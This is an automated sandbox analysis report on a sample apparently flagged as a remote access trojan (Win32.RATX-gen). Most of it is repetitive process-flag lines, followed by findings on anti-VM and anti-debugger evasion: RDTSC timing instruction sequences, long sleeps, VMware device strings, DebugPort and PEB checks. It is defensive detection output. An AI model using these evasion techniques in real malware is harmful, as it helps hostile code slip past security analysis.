Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59904 second address: 2B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59B7E second address: 2B59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999904 second address: 299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999B7E second address: 2999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: AF00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 9640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6799	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4277	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5651	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 890	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9652	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 1.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe TID: 5332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe TID: 6332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 4277 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -8554000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 5651 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -11302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -638000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 9652 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -19304000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000009.00000000.2154297535.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000009.00000002.4578457861.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2163252366.0000000008C55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_01172B60 LdrInitializeThunk,

7_2_01172B60

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_007225B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

15_2_007225B2

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160124 mov eax, dword ptr fs:[00000030h]	7_2_01160124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C156 mov eax, dword ptr fs:[00000030h]	7_2_0112C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
